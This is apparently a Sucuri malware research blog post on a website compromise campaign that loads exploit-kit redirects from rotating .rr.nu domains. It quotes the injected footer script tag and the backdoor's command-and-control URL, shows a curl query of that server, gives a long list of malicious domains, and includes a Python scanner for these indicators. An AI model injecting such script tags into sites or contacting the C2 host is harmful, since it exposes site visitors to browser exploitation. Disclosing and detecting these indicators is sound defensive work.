Malware Campaign from .rr.nu

No, they don’t quit, so get used to it! We are seeing quite a few websites being compromised with malware getting loaded from random domains in the .rr.nu TLD.

This is what gets added to the footer of the hacked sites:

<script  src= "http://trill18ionsa.rr.nu/pmg.php?dr=1"></script>

Once loaded, it performs another level of redirection to http://ixeld52erlya.rr.nu/n.php?h=1&s=pmg (the domain is random, but the parameters h=1&s=pmg stay the same), which then attempts to exploit the visitor's browser using multiple exploit kits.

Those domains are changing daily, but always pointing to 194.28.114.103. What’s interesting is that the compromised sites also have a backdoor that calls http://www.lilypophilypop.com/g_load.php (their command and control) to get the new list of domains to display.
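As an added example (not code from this post or from Sucuri), the script below shows how a site owner could sweep a document root for the two indicators described above: a <script> include pulled from a .rr.nu host and a reference to the lilypophilypop.com/g_load.php call-home URL (plus the 194.28.114.103 address the domains resolve to). The file extensions scanned and the sample page contents are assumptions constructed for the example; the indicator values themselves come from the post.

```python
import os
import re
from typing import Dict, List, Tuple

# Indicators quoted in the post: <script> includes from random .rr.nu hosts,
# the backdoor's call-home URL, and the IP the .rr.nu domains resolve to.
RR_NU_SCRIPT = re.compile(
    r'<script[^>]*\bsrc\s*=\s*["\']?\s*(https?://[a-z0-9-]+\.rr\.nu/[^"\'\s>]*)',
    re.IGNORECASE,
)
C2_URL = re.compile(r"lilypophilypop\.com/g_load\.php", re.IGNORECASE)
C2_IP = "194.28.114.103"

# File types worth checking in a typical PHP site (assumption, not from the post).
SCAN_EXTENSIONS = (".php", ".html", ".htm", ".js", ".tpl")


def scan_text(text: str) -> List[Tuple[str, str]]:
    """Return (indicator, matched value) pairs found in one file's content."""
    findings: List[Tuple[str, str]] = []
    for m in RR_NU_SCRIPT.finditer(text):
        findings.append(("rr.nu-script-include", m.group(1)))
    if C2_URL.search(text):
        findings.append(("backdoor-c2-url", "lilypophilypop.com/g_load.php"))
    if C2_IP in text:
        findings.append(("c2-ip", C2_IP))
    return findings


def scan_tree(root: str) -> Dict[str, List[Tuple[str, str]]]:
    """Walk a document root and map each file with findings to its indicators."""
    hits: Dict[str, List[Tuple[str, str]]] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCAN_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            try:
                # Injected code is often appended to binary-ish files, so decode leniently.
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    found = scan_text(fh.read())
            except OSError:
                continue
            if found:
                hits[path] = found
    return hits


# Constructed samples: a footer carrying the injection shown in the post,
# a PHP fragment that merely references the call-home URL, and a clean page.
SAMPLE_FOOTER = (
    '<div id="footer">&copy; Example Site</div>\n'
    '<script  src= "http://trill18ionsa.rr.nu/pmg.php?dr=1"></script>\n'
    "</body></html>\n"
)
SAMPLE_BACKDOOR_REF = "<?php $src = 'http://www.lilypophilypop.com/g_load.php'; ?>"
SAMPLE_CLEAN = "<html><body><p>Nothing to see here.</p></body></html>"


if __name__ == "__main__":
    import sys

    for label, sample in (
        ("footer", SAMPLE_FOOTER),
        ("backdoor", SAMPLE_BACKDOOR_REF),
        ("clean", SAMPLE_CLEAN),
    ):
        print(label, scan_text(sample))
    # Optionally sweep a real document root passed on the command line.
    if len(sys.argv) > 1:
        for path, found in scan_tree(sys.argv[1]).items():
            for kind, value in found:
                print(f"{path}: {kind} -> {value}")
```

The pattern deliberately tolerates the odd spacing seen in the injected tag (`src= "http://…`), but it only catches the plain form quoted in the post; an injection that builds the URL from encoded or concatenated strings would need a decoder in front of this check. Treat any hit as a signal to look for the backdoor file itself, since cleaning the footer alone leaves the call-home in place.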

A quick query of this site shows the current live domains:

$ curl -sq http://www.lilypophilypop.com/g_load.php
http://uotes98satur.rr.nu/
http://ixeld52erlya.rr.nu/
http://ile68depa.rr.nu/
http://cie69svoi.rr.nu/
http://ues02the.rr.nu/
http://ordonv12ectorct.rr.nu/
http://ngv83ete.rr.nu/
http://waranc72hexcit.rr.nu/
http://ereaso88nsphas.rr.nu/
http://erbac03klogwi.rr.nu/
http://rtfall80shesdo.rr.nu/
http://mitexp80ressman.rr.nu/
http://tingst30iffles.rr.nu/
http://ford53blue.rr.nu/
http://trill18ionsa.rr.nu/

Here are domains we have found so far:

aising32austral.rr.nu
anc57erid.rr.nu
ancisc11oretai.rr.nu
arcot97icscch.rr.nu
asu31ryc.rr.nu
atio79srem.rr.nu
ban85kmak.rr.nu
bea90utym.rr.nu
cdeter66minatio.rr.nu
chelpo94landsa.rr.nu
chread73erspar.rr.nu
cie69svoi.rr.nu
dend21ange.rr.nu
deunce68rtaint.rr.nu
dsadva20ntages.rr.nu
eacti41vities.rr.nu
ectors56rushedb.rr.nu
edu11tch.rr.nu
enc89efo.rr.nu
ent70als.rr.nu
ents14publ.rr.nu
erbac03klogwi.rr.nu
ereaso88nsphas.rr.nu
ers49sup.rr.nu
esed94ownu.rr.nu
evaryc13ornerf.rr.nu
ffs06dive.rr.nu
ford53blue.rr.nu
ged20sha.rr.nu
gerd84eckpa.rr.nu
ghl07evel.rr.nu
ibl42efar.rr.nu
ile68depa.rr.nu
ime27glim.rr.nu
ingin64terac.rr.nu
insist18suspen.rr.nu
irdcap79turedre.rr.nu
irstde24clined.rr.nu
iss79ione.rr.nu
itioni67nggene.rr.nu
itsd81evic.rr.nu
ive49scor.rr.nu
ixeld52erlya.rr.nu
jitsu17quakec.rr.nu
king35dayv.rr.nu
lanne44rsacqu.rr.nu
lia82tio.rr.nu
llyim30munity.rr.nu
mitexp80ressman.rr.nu
mputer94izeduni.rr.nu
nadap83artic.rr.nu
ncello05rjuice.rr.nu
ncho61ragef.rr.nu
ngbe82ntse.rr.nu
ngv83ete.rr.nu
nhanc79emayb.rr.nu
nic99wel.rr.nu
nlygpa40rentsre.rr.nu
nom21iesa.rr.nu
nwin54simpl.rr.nu
odity02prince.rr.nu
omist96smoto.rr.nu
onmyse88lfadvis.rr.nu
onth92send.rr.nu
ordonv12ectorct.rr.nu
orkic86kedgra.rr.nu
oul44dbe.rr.nu
pital40relat.rr.nu
quic34kprog.rr.nu
rcles12mainde.rr.nu
renw05insim.rr.nu
rie21rcom.rr.nu
rin43gco.rr.nu
roduc37edter.rr.nu
rpo66rat.rr.nu
rtfall80shesdo.rr.nu
rwest23pasto.rr.nu
sba15gsed.rr.nu
ssurem70ountai.rr.nu
sup01port.rr.nu
syste98msman.rr.nu
tarian13cheese.rr.nu
tel90yget.rr.nu
terda31ytime.rr.nu
tfo04lio.rr.nu
tin04gobs.rr.nu
tingst30iffles.rr.nu
tomoti62veform.rr.nu
trill18ionsa.rr.nu
ttr92acte.rr.nu
ublic19ations.rr.nu
ues02the.rr.nu
untyh37umane.rr.nu
uotes98satur.rr.nu
vesc01hang.rr.nu
vesr27epla.rr.nu
waranc72hexcit.rr.nu

We will post more details as we continue monitoring this campaign and learn more.

Let us know in the comments below if you have any questions.

About David Dede

Sucuri Security bot (crazy work) - Malware research updates, sucuri news and more.